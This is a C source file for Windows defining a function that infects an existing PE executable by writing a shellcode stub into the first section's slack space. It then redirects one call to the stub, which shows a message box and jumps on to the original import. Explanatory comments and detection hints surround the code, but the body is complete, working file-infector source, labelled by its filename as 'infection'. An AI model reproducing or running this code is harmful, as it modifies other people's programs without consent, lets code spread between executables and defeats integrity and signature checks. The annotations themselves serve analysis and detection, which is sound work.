#include <windows.h>
// InjectCode: opens an existing PE file, maps it read/write, and patches it on
// disk. It copies the machine-code stub in thunkcode into the unused bytes
// between the first section's VirtualSize and SizeOfRawData, then rewrites the
// displacement of one existing call instruction so that it targets the stub.
// This matches the pattern usually called file infection via section slack.
//
// szHostFile: path of the file that is opened and modified in place.
//
// Returns -1 when the file cannot be opened or mapped. Returns 0 in every
// other case, including when the headers do not validate, the gap is too small
// or no matching call is found, so the return value does not say whether the
// file was changed.
//
// Notes for analysis and detection, all derived from the code below:
//  - AddressOfEntryPoint is only read (OldEntry is assigned and never used),
//    so a modified file keeps its original entry point; entry-point checks
//    alone will not flag it.
//  - The bytes that change are one 4-byte call displacement inside the first
//    section and sizeof(thunkcode) bytes starting at
//    PointerToRawData + VirtualSize of that section.
//  - Because file content changes, a hash baseline or an Authenticode
//    signature check of the target no longer matches afterwards.
//  - Pointers are cast to DWORD throughout, so the code assumes a 32-bit
//    build and 32-bit PE headers.
int InjectCode(char szHostFile[])
{//
PIMAGE_DOS_HEADER pImageDosHeader ;
PIMAGE_NT_HEADERS pImageNtHeaders ;
PIMAGE_SECTION_HEADER pImageSectionHeader;
// Opaque x86 machine-code stub that is written into the target file.
// The 4-byte fields at offsets 27..30 (initially 78 56 34 12) and 37..40 are
// placeholders overwritten further down. The bytes after the 0x90 look like
// data rather than instructions - TODO confirm by disassembly.
unsigned char thunkcode[] = "\x60\x9c\xe8\x00\x00\x00\x00\x5b"
"\x81\xeb\x0d\x10\x40\x00\x6a\x00"
"\x8d\x83\x30\x10\x40\x00\x50\x50"
"\x6a\x00\xb8\x78\x56\x34\x12\xff"
"\xd0\x9d\x61\xff\x25\x3a\x10\x40"
"\x00\x90\xBD\xF0\xD6\xED\xB0\xDD"
"\xC4\xEA\x00";
HANDLE hFile ;
HANDLE hMap ;
LPVOID pMapping ;
DWORD dwGapSize ;
unsigned char *pGapEntry ;
int i ;
PROC MsgBox ;
DWORD OldEntry ;
// Shift amount used when storing a 32-bit value byte by byte (24, 16, 8, 0).
int x = 0x18 ;
int vir_len ;
unsigned char *pSearch ;
DWORD *dwCallNextAddr ;
// dwCallDataOffset and dwCallData are declared but never used in this function.
DWORD *dwCallDataOffset ;
DWORD *dwCallDataAddr ;
DWORD dwCallData ;
DWORD dwCodeDistance ;
DWORD *dwJmpAddr ;
DWORD dwJmpData ;
DWORD dwJmpVA ;
// Open the existing target file; the handle backs the writable mapping below.
hFile = CreateFile(szHostFile,
FILE_SHARE_READ|FILE_SHARE_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL) ;
if (hFile==INVALID_HANDLE_VALUE)
{
return -1 ;
}
// Map the whole file PAGE_READWRITE: stores through pMapping change the file.
hMap = CreateFileMapping(hFile,
NULL,
PAGE_READWRITE,
0,
0,
NULL) ;
if (!hMap)
return -1 ;
pMapping = MapViewOfFile(hMap,
FILE_MAP_ALL_ACCESS,
0,
0,
0) ;
if (!pMapping)
return -1 ;
// Validate the DOS ("MZ") and NT ("PE") signatures before touching anything.
pImageDosHeader = (PIMAGE_DOS_HEADER)pMapping ;
if (pImageDosHeader->e_magic==IMAGE_DOS_SIGNATURE)
{
pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)pMapping+pImageDosHeader->e_lfanew) ;
if (pImageNtHeaders->Signature==IMAGE_NT_SIGNATURE)
{
// First section header, taken to sit directly after IMAGE_NT_HEADERS.
pImageSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)pMapping+
pImageDosHeader->e_lfanew+
sizeof(IMAGE_NT_HEADERS)) ;
// Gap = raw bytes on disk beyond the section's virtual size.
// Nothing is modified when the stub does not fit.
dwGapSize = pImageSectionHeader->SizeOfRawData - pImageSectionHeader-
>Misc.VirtualSize ;
if (sizeof(thunkcode)>dwGapSize)
goto Close ;
// Address inside the mapping where the gap starts (stub destination).
pGapEntry = (unsigned char *)(pImageSectionHeader->PointerToRawData+
(DWORD)pMapping+
pImageSectionHeader->Misc.VirtualSize) ;
// Original entry point VA; computed here but not used afterwards.
OldEntry = pImageNtHeaders->OptionalHeader.ImageBase+
pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ;
MsgBox = (PROC)GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA") ;
// Store the MessageBoxA address as resolved on the current system into the
// stub's placeholder at offsets 27..30, least significant byte first.
for (i=3;i>=0;i--)
{
thunkcode[i+27] = ((unsigned int)MsgBox>>x)&0xff ;
x -= 8 ;
}
// Reset the shift amount for the second placeholder.
x = 24 ;
vir_len = (int)pImageSectionHeader->Misc.VirtualSize ;
pSearch = (unsigned char *)(pImageSectionHeader->PointerToRawData+
(DWORD)pMapping) ;
// Scan the first section's bytes for the call opcode (0xe8).
for (i=0;i<vir_len;i++)
{
if (pSearch[i]==0xe8)
{
// Operand of the candidate call and the address of the byte after it.
dwCallDataAddr = (DWORD *)(&pSearch[i]+1) ;
dwCallNextAddr=(DWORD *)(&pSearch[i]+5) ;
// Call target, computed as an address inside the mapping.
dwJmpAddr = (DWORD *)(*dwCallDataAddr+ (DWORD)dwCallNextAddr) ;
// dwJmpVA is computed but never used.
dwJmpVA = (DWORD)dwJmpAddr-
((DWORD)pMapping+pImageSectionHeader->PointerToRawData)+
pImageNtHeaders->OptionalHeader.ImageBase+
pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ;
// 4-byte operand that follows the first two bytes of the call target.
dwJmpData = *((DWORD *)((unsigned char *)dwJmpAddr+2)) ;
// Only proceed when the target begins with bytes FF 25 (indirect jmp),
// presumably an import jump stub - TODO confirm.
if ((*dwJmpAddr&0xffff)==0x25ff)
{
// Rewrite the call displacement so the call lands on the gap.
dwCodeDistance = (DWORD)pGapEntry - (DWORD)dwCallNextAddr ;
*dwCallDataAddr = dwCodeDistance ;
// Store the original jmp operand into the stub at offsets 37..40.
for (i=3;i>=0;i--)
{
thunkcode[i+37] = ((unsigned int)dwJmpData>>x)&0xff ;
x -= 8 ;
}
// Copy the finished stub into the gap, i.e. into the file.
for (i=0;i<sizeof(thunkcode);i++)
{
pGapEntry[i] = thunkcode[i] ;
}
// Only the first matching call is patched.
break ;
}
}
}
}
}
// Common cleanup for the paths that reach here; the early returns above skip it.
Close:
UnmapViewOfFile(pMapping) ;
CloseHandle(hMap) ;
CloseHandle(hFile) ;
return 0 ;
}
ganran.rar_感染